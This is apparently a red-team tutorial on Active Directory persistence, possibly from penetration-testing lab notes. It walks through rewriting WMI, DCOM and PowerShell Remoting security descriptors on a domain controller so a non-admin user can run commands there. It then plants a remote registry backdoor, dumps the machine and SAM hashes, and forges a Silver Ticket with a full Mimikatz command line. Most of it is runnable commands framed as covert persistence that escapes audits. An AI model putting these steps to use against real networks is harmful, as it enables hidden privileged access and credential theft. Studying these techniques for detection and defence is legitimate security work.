Modifying Remote Protocol Security Descriptors

This is an interesting way to obtain persistence because the ACL's for Remoting Protocols are rarely audited.

You must have Domain Admin privileges to perform these attacks. Modifying these descriptors can give non-admin users access to such things as WMI, Powershell Remoting, and the Remote Registry without having to give him Domain Admin privileges.

Subsequently the non-admin user will then be able to execute commands on the DC despite not being an admin.

Modifying the Descriptors Manually From the DC - Giving a User Full Control Over the WMI Namespace

Step 1 - In Component Services, Change the DCOM Permissions of the Computer

• Give the user Remote Access permissions

• Then give him all Launch and Activation permissions

Step 2 - Modify the WMI Namespace Settings in Computer Management

• Give the user full rights over the root WMI namespace

• Then make sure those rights apply to all of the child namespaces as well

Step 3 - Check the Access of the Non-Admin User to the DC

PS C:\Windows\system32> Get-WmiObject -Class win32_operatingsystem -ComputerName dc.domain


SystemDirectory : C:\Windows\system32
Organization    :
BuildNumber     : 14393
RegisteredUser  : Windows User
SerialNumber    : 00377-80000-00000-AA805
Version         : 10.0.14393

Now our user can execute commands on the DC.

Giving a User Access to WMI From Powershell

With Set-RemoteWMI.ps1 (from Nishang)

. .\Set-RemoteWMI.ps1

Set-RemoteWMI -ComputerName <dc> -UserName <user> -Namespace 'root\cimv2' -verbose [-Credential <Domain Admin>]

Then login as that user and check the access:

Get-WmiObject -Class win32_operatingsystem -ComputerName <dc>

To Remove the Modified Descriptor

Set-RemoteWMI -ComputerName <dc> -UserName <user> -Namespace 'root\cimv2' -verbose -Remove [-Credential <Domain Admin>]

Change the Powershell Remoting Descriptors

With Set-RemotePSRemoting.ps1 (from Nishang)

Set-RemotePSRemoting -UserName <user> -ComputerName <dc> -Verbose

Then Execute Commands Remotely on the DC

Invoke-Command -ComputerName <dc> -ScriptBlock {<command>}

Changing the Remote Registry to Add a Backdoor and Retrieve Hashes

Step 1 - With Add-RemoteRegBackdoor.ps1

. .\Add-RemoteRegBackdoor.ps1

Add-RemoteRegBackdoor -ComputerName <dc> -Trustee <user>

Step 2 - In a New Window as the User, Use RemoteHashRetrieval.ps1

# Get the DC Machine Hash
Get-RemoteMachineAccountHash -ComputerName dcorp-dc -Verbose

# Dump the Local SAM Hashes
Get-RemoteLocalAccountHash -ComputerName dcorp-dc -Verbose

Step 3 - Exploit

• With the DC hash we can create Silver Tickets.

Invoke-Mimikatz -Command '"kerberos::golden /domain:<domain> /sid:<domain-SID> /target:<target-domain> /service:<service> /rc4:<service-acct-or-computer-hash> /user:Administrator /ptt"'

• With the Local Administrator hash we can DCSync or take advantage of the local Administrator hash being the DSRM password.